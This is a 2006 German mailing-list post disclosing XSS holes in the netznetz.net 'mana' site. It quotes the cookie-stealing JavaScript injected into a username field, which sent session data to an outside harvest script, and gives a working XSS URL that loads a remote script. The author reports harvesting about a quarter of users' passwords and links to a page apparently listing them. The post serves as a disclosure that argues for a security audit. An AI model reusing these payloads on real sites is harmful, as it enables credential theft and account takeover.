[Metalab] neues [netznetz.net] -> neue abendunterhaltung, neuer hack

Aaron Kaplan aaron at lo-res.org
Thu Mar 30 23:30:45 CEST 2006 


Liebe Carla,

ich hoffe untenstehende mail erklaert, warum man nicht "einfach so"  
ein webformular fuer die anmeldung hernehmen sollte.

Lieber Domm,

ich hoffe ich entlocke dir ein paar schmunzler und hoffe ich hab das  
niveau mit dieser mail gehoben ... :)

Liebe liste und leser,

Teil #27 unsere taeglichen telenovella "netznetz aka. RAN AN DIE  
MILLION"...

vorweg, 1) ich finds gut, dass das jetzt auf neue server kommt und 2)  
ja, das ganze voting sollte in real life passieren, nicht  
elektronisch. Und es wird eh real life sein, wie immer wieder  
angekuendigt. Ich bin sicher, andreas trawoeger hat da wirklich sehr  
gute ideen gehabt (fuer die BB grants).

Ausserdem: alles in der mail unten bezieht sich auf den _alten_  
server mana.netznetz.net (mit den _alten_ passwoertern. Das erklaert  
auch warum eine neue anmeldung nicht so bloed ist)

 >>>>>
OOPS! update vor 3 minuten: dank http://csi.lo-res.org wissen wir  
jetzt auch, dass AUCH die NEUE SEITE mana.manila.at XSS scriptable  
ist. Tja... zu frueh gefreut...
Mal sehen, was mit dem neuen server machbar ist... work in progress...

click:

  http://mana.manila.at/discuss/msgReader$15?mode=%22%3E%3Cscript% 
20src=http://csi.lo-res.org/csi.js%3E%3C/script%3E  (testen on MacOS X)
<<<<<


On Mar 30, 2006, at 9:09 PM, Thomas Klausner wrote:

> Hi!
>
> On Thu, Mar 30, 2006 at 05:14:06PM +0200, Aaron Kaplan wrote:
>
>> nun, liebe leute, da hab ich eine gute antwort darauf :)
>>
>> mana.netznetz.net war die GANZE ZEIT wieder gehackt . Naemlich ueber
>> ein web  formular (XSS attack)
>
> Nochmal: mana.netznetz.net war nie als 'sichere' Kiste geplant,  
> sondern
> als offene Platform fuer verschiedene beiteiligte developerInnen.


schon klar :) und es wird auch niemand einen vorwurf draus machen.  
Und am allerwenigsten wuerde ich dir ( domm ) einen vorwurf machen.  
Ich denke, dass du unglaublich viel und gutes in absolut chaotischen  
bedingungen in extrem wenig zeit super gecoded hast (ehrlich gemeint!  
haette es definitiv nicht so gut gekonnt).

Darf ich aber trotzdem meine erkenntisse praesentieren? Ich finds  
einfach witzig! Und bitte das auch mit dem notwendigen humor zu  
lesen. Tada!

The HACK
=========

Ich hab naemlich vorher ueber einen _neuen_ hack (und diesmal ist es  
ein hack)
geredet. Neu und frisch serviert aber schon ein paar wochen im system.


Vielleicht erkennt der eine oder andere hier sein passwort?

    http://tema.lo-res.org/~aaron/mana/alteseite/moms.html


Das webformular war XSS scriptable[1] ;-)
Autor des hacks: Michael Bauer (mihi at lo-res.org) mit ein klein wenig  
hilfe von mir
(aaron at lo-res.org). Aber der genius teil liegt sicher bei ersterem.


XSS scripting
==============
1. Bob hosts a web site which allows users to post messages and other  
content to the site for later viewing by other members.
2. Mallory notices that Bob's website is vulnerable to a type 2 XSS  
attack.
3. Mallory posts a message, controversial in nature, which may  
encourage many other users of the site to view it.
4. Upon merely viewing the posted message, site users' session  
cookies or other credentials could be taken and sent to Mallory's  
webserver without their knowledge.
5. Later, Mallory logs in as other site users and post messages on  
their behalf....

(Aus [1])

Was heisst das in unserem fall?
===============================

In der session war das mana passwort gespeichert.
Jeder browser fragt nach einem bild (http://tema.lo-res.org/~aaron/ 
mana/alteseite/microglider.html) . Dieses bild ist ein paar pixel  
gross und schaut am montitor aus wie ein kleines stueck dreck. Das  
ist ja der perfide daran.

Jetzt hat mihi in seinem usernamen / seiner userbeschreibung einen  
kleinen javascript code eingefuegt:
# <script>document.open();
# document.write('<img ');
# document.write('src="$URL/manaharvest.cgi?');
# document.write(document.cookie);
# document.write('">');
# </script>

Dieser javascript code requested das bild ("microglider"). Also  
eigentlich kommt das microglider .png bild zurueck. Beim requesten  
hat er aber das passwort an die seite geschickt, von der der  
microglider kam [5].

voila!
Wir haben auf diese art ca. ein viertel (!!) aller pwds gefuden.
Oder anders gesagt: die einzelnen browser der mana registrierten  
haben ihr passwort selber unbemerkt verraten.

Unter [4] ist das gesamte XSS script zu finden. Sehr lehrreich.


----
Also wenn _das_ nicht netzkultur ist, dann weiss ich auch nicht mehr  
weiter ;-))))



REFERENCES
==========
[1] Cross site scripting - http://en.wikipedia.org/wiki/ 
Cross_site_scripting
[2] die passwoerter - http://tema.lo-res.org/~aaron/mana/alteseite/ 
moms.html
[3] der glider - http://tema.lo-res.org/~aaron/mana/alteseite/ 
microglider.html
[4] manaharvest - http://tema.lo-res.org/~aaron/mana/alteseite/ 
manaharvest.txt
[5] genauer gesagt, beim requesten hat er die session mitgeschickt.  
Aus der session wird dann das passwort rausgeholt.

PS: wenn die leute fuers coden was kriegen? kriegen wir (privat,  
mihi, aaron) was fuers security testen?
Wie viel wird denn fuers coden vom herrn slunksy verrechnet? Vor  
kurzem meinte er noch auf dem metalab treffen "ich brauch ein paar  
coder, es gibt 3k-4k euro"
Sorry, ganz ganz frech gefragt.

>
> An sich hat es ja geheissen, dass Mana ab Anfang Jaenner auf einem
> Server der Stadt Wien lauft. Dazu kams nicht. Und im Jaenner-Chaos hat
> niemand dran gedacht, die offene Kiste mana.netznetz.net abzusichern
> (auf der inzwischen ja alle Leute mit Zugang (und das waren viele,
> standen (oder stehen) diverse Passwoerter ja in div. Wikis/ 
> Mailarchiven - beabsichtigerweise!) verschiedenste Backdoors,  
> Trojaner, wasweissichwaas installiert haben haetten koenne).
>
> Es gab mal einen Vorschlag, ein Security Audit zu machen, der ist aber
> (wie manche andere sinnvollen Vorschlaege) im niveulosen hick-hack
> untergegangen.
>
sollte man ABSOLUT machen! Zumindest bevor mit der software wirklich  
gewaehlt wird.


>> beweis kommt heute abend wenn ich ein bissi zeit hab, die mail
>> auszuformulieren :)
>>
>> das ganze hier erinnert mich echt manchmal an favela soap operas
>
> me to :-/

:) mit humor nehmen.

>
>> frage: wo ist die alte seite hin? ich haette sie gerne nur aus demo
>> gruenden.
>
> Die alte Seite (mana.netznetz.net) ist semi-abgedreht, alles wird nach
> mana.manila.at forgewardet, wo ein Info-CMS rennt (oder so, bitte
> diesbezueglich Slunsky fragen (der hat das glaub ich gemacht)
>
> Aber natuerlich ist der Code immer noch via subversion verfuegbar,  
> d.h.
> du kannst auf einem deiner Server eine Demo aufsetzten.

> Schoenen Abend,
> Thomas (der sich das Niveau von OSS-Development-Listen fuer  
> netznetz.net
> wuenscht)
>

ich hoffe, ich habe dich erheitert und mehr niveau geliefert.

lg,
a.

PPS: alle bugs in dieser mail sind von mir.

PPPS: wenn wir die alte seite samt DB noch irgendwo online haben,  
dann kann man im mihi account den glider sehen :) Zumindest fuer  
archivzwecke waers cool.

PPPS: Und fuer alle, die aufgrund so einer mail glauben alles ist  
furchtbar:
Seit karl popper wissen wir ja, dass man maximal eine theorie  
falsifizieren kann.
Ein programm/software ist so was wie eine theorie. Also nichts  
_wirklich_ schlimmes passiert. Es ist keiner mit leib und leben oder  
eigentum zu schaden gekommen, ok?
It's simply (part of) netculture.

More information about the Metalab mailing list